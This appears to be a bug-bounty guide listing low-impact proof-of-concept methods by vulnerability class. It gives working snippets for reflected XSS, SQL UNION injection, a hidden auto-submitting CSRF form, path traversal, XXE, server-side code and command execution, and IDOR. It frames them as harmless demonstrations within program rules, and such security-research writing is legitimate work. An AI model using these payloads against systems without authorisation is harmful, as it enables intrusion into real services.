I have a little secret for you that will completely change the way you create your proofs of concept: stick to the rules like a white hat, and then, with that in mind, craft your proof of concept thinking like a black hat. In other words, always follow the rules while hunting; when it comes to demonstrating the impact of the issue, build your proof of concept in a way that highlights how your finding could potentially affect the target. This does not always work, and it certainly does not mean you should start escalating the issue or gaining unauthorised access. It simply means you need to understand the real potential impact of your finding and then, working within the program's rules, create something clever that could actually work in a real-world scenario. You can see this mindset in action in this report.
This is a mega list of proof of concepts (PoCs) to use when demonstrating the impact of your issue. The PoCs are designed so that the bug bounty program can quickly understand the issue, and so that you do not harm any of their users or services in the process. That said, always follow the rules in the program's policy; the program's security policy takes precedence over this list.
Issue type | PoC |
---|---|
Cross-site scripting | alert(document.domain) or setInterval`alert\x28document.domain\x29` if you have to use backticks. [1] Using document.domain instead of alert(1) can help avoid reporting XSS bugs in sandbox domains, as described on the Google Bughunter University site. |
Command execution | This involves the execution of arbitrary commands on a target server. Check the program's security policy, as specific commands may be designated for testing; for example, Yahoo defines a set of primitives to ensure researchers "minimise the mayhem." |
Code execution | This involves the manipulation of a web app such that server-side code (e.g. PHP) is executed. Prove it with a harmless statement, such as echoing the result of a simple calculation, rather than anything that modifies the system. |
SQL injection | If column values can be influenced, grabbing the SQL server's version string is usually enough to demonstrate basic SQL injection capability. |
Unvalidated redirect | Redirect to a harmless page that you control, or to one designated by the program, to demonstrate that the destination is attacker-controlled. Never redirect users to malicious or offensive content. |
Information exposure | Data exposure manifests in a variety of forms. Use self-created test accounts (or accounts provisioned by the program you are working with). Say you are looking for an IDOR vulnerability, in this example an endpoint that lets you iterate over an ID parameter (e.g. ?id=1337) to disclose another user's information. Investigate only with the IDs of your own test accounts, never against other users' data, and describe your full reproduction process in the report. |
Cross-site request forgery | Once you have confirmed the presence of a CSRF bug (ensuring there are no leftover token or nonce values), either attach a file to demonstrate your proof of concept or paste the code in a code block in your report. When designing a real-world example, either hide the form (style="display:none;") and make it submit automatically, or design it so that it resembles a component of the target's page. |
Server-side request forgery | The "How To" article from HackerOne is an excellent introduction to SSRF. As Jobert explains, webhooks, parsers, and PDF generators are often vulnerable. The impact of an SSRF bug varies; a non-exhaustive list of proof of concepts includes reaching internal-only services, making the target fetch a resource from a server that you control, and querying internal metadata endpoints where the program's policy permits. |
Local and remote file inclusion | Local file inclusion allows you to include and execute files that are already present on the target system; remote file inclusion allows you to include and execute a file served from a host that you control, typically resulting in code execution. Demonstrate either with a harmless file. |
Local file read | This only allows you to read files located on the target system. Make sure to only retrieve a harmless file. Check the program security policy as a specific file may be designated for testing. |
XML external entity processing | Output random harmless data. [3] |
Sub-domain takeover | Claim the sub-domain discreetly and serve a harmless file on a hidden page. Do not serve content on the index page. You may use the proof of concept found here. |
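For the cross-site scripting row, the payload is usually delivered by breaking out of the reflected context. A sketch, assuming a hypothetical search parameter that is reflected unescaped inside an attribute:

```html
<!-- Hypothetical injection: ?q="><script>alert(document.domain)</script> -->
<input value=""><script>alert(document.domain)</script>">
<!-- Where parentheses are filtered, the backtick form still fires: -->
<script>setInterval`alert\x28document.domain\x29`</script>
```

Using document.domain in the dialog shows at a glance which origin the script executed in, which is exactly the evidence a triager needs.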
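For the code execution row, the conventional harmless proof is evaluating a simple expression server-side, for example in PHP. This is a generic sketch, not a program-endorsed payload:

```php
<?php
// Harmless proof: if this is evaluated server-side, the response
// contains 49 and nothing on the system is modified.
echo 7 * 7;
```

A response containing 49 where the literal source would otherwise appear demonstrates evaluation without any side effects.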
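For the SQL injection row, version-string payloads differ per database engine. The following are standard, assuming a single-column UNION-capable injection point; pad with NULLs to match the real column count:

```sql
-- MySQL / Microsoft SQL Server
' UNION SELECT @@version-- -
-- PostgreSQL
' UNION SELECT version()-- -
-- SQLite
' UNION SELECT sqlite_version()-- -
```

Reporting the returned version string proves read access without touching any user data.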
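For the cross-site request forgery row, the classic PoC is a self-submitting hidden form. The action URL and field name here are hypothetical, and the change should target only your own test account:

```html
<!-- Hypothetical state-changing endpoint; affects your own test account only -->
<form action="https://target.example/settings/email" method="POST"
      style="display:none;">
  <input type="hidden" name="email" value="poc@your-test-domain.example">
</form>
<script>document.forms[0].submit();</script>
```

Host the page yourself, visit it while logged in to your test account, and document the resulting state change.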
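For the local file read row, a typical harmless demonstration is a traversal payload aimed at a benign file. The parameter name and traversal depth below are hypothetical; use the program-designated file if one exists:

```http
GET /download?file=../../../../etc/hostname HTTP/1.1
Host: target.example
```

A benign file like /etc/hostname proves the read primitive without exposing credentials or user data.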
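For the XML external entity row, an internal entity that expands to harmless marker text demonstrates that entities are processed at all, without reading any file or making an outbound request. Element and entity names here are arbitrary:

```xml
<?xml version="1.0"?>
<!DOCTYPE poc [
  <!ENTITY marker "xxe-poc-harmless-data">
]>
<root>&marker;</root>
```

If the marker string appears in the response, entity expansion is confirmed; escalate to external entities only if the program's policy explicitly allows it.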
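For the command execution row, harmless read-only commands are the usual way to prove execution without touching data. The two below are a common, assumed-safe choice for illustration, not any program's actual whitelist; always defer to the policy:

```shell
# Read-only commands that identify the executing user and host
# without modifying anything on the target.
id
uname -n
```

Capture the output in your report rather than running anything further.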
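For the information exposure row, the reproduction can be scripted so that it only ever touches accounts you own. A sketch in Python; the endpoint, parameter name, and IDs are all hypothetical placeholders:

```python
from urllib.parse import urlencode

# Hypothetical endpoint and test-account IDs; replace with your own.
BASE = "https://target.example/api/profile"
OWN_TEST_IDS = [1337, 1338]  # accounts you created yourself

def poc_urls(ids):
    """Build the exact request URLs used in the PoC, one per owned ID."""
    return [f"{BASE}?{urlencode({'id': i})}" for i in ids]

for url in poc_urls(OWN_TEST_IDS):
    print(url)
```

Listing the exact URLs in the report gives the program a precise, harmless reproduction path.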